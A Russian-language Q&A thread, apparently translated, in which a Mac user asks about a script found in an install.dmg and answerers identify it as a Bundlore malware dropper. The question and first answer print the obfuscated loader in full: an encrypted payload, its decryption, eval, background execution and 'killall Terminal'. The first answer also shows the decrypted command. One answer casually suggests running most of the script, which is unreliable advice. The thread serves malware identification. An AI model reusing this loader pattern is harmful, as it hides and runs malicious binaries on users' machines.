Странный файл install.dmg. Это вредоносная программа?

Question

У меня есть MacBook Pro с установленной ОС Catalina, и я открыл программное обеспечение, которое дал мне друг. Один из них содержал следующий скрипт:

#!/bin/bash
appDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal 

Кто-нибудь знает, что это такое и что делает?

Answer 1

Я нашел похожий файл DMG на компьютере клиента для поддельного установщика Adobe Fla sh. DMG монтируется как: Install.

Вот список файлов:

./.hidden
./.hidden/HLJmbHkfitABiHhn
./.hidden/install.command
./.xpXAWXkM.png
./Install

Install.command содержит следующее:

#!/bin/bash
export appDir=$(cd $(dirname "$0"); pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18lOdkLzSozhmQGEu7a8leGWy6jXW+BllZXUi1W/XnAEKBrL+EM1wsawN6qJDJMNcpDsivBE/qDTo+KEceFM+Nre/iI0wYp0PrayPcp3ZqWHk08tu5PUtbu86Q/GnAtxxpdbDf4/c6ZeMNsEIS/X/uBB3SwqZA0t6+UrqlZhxwcluRVLaLUe6agBYVdP3okkrhjPaOnkz/aI0boFmvWqcc0yVA4GdGobookmiXFhiINCDjiQlt3zFPGfhVLmG3R/p5ACeYwob2D+BX7qn6Z2r0t4psAFpXnx8Ch/QZPAjM3cq7NfmbDk7Wy'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -pass "pass:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal 

Из скрипта , HLJmbHkfitABiHhn - ключ дешифрования. Таким образом, decryptedCommand - это (после расшифровки):

$(echo "openssl enc -aes-256-cbc -d -A -base64 -k \"$archive\" -in \"$appDir/$archive\" -out \"$tmpDir/$binFile\"; xattr -c \"$tmpDir/\"*; chmod 777 \"$tmpDir/$binFile\"; \"$tmpDir/$binFile\" && rm -rf $tmpDir")

Выше просто расшифровывает ./.hidden/HLJmbHkfitABiHhn в двоичный файл, чтобы запустить его, используя HLJmbHkfitABiHhn (снова) в качестве ключа.

Этот бинарный файл - Bundlore Malware. См. Отчет VirusTotal

Answer 2

Почти наверняка вредоносное ПО. Трудно быть уверенным без всего этого (ключ шифрования находится в файле «.command» в том же каталоге), но он показывает определенные признаки скрытия того, что он делает. Фактический контент зашифрован с использованием ключа в другом файле, и после расшифровки и запуска этого скрытого контента он убивает приложение терминала (предположительно, чтобы скрыть то, что он только что сделал).

Кстати, есть некоторое обсуждение этого файл на minecraftforge. net, где они пришли к аналогичному выводу. Ваш друг, вероятно, загружал программное обеспечение из ненадежных источников.

Answer 3

Это bash скрипт.

Если вы запустите все, кроме последних 2, вы должны быть в полной безопасности - и, вероятно, сможете увидеть, что он хочет делать.

Answer 4

Не уверен, если вы уже знаете / заметили, но командная часть зашифрована, поэтому единственный способ действительно узнать, что происходит, - использовать этот расшифрованный код, может быть, какое-то программное обеспечение для расшифровки на inte rnet может помочь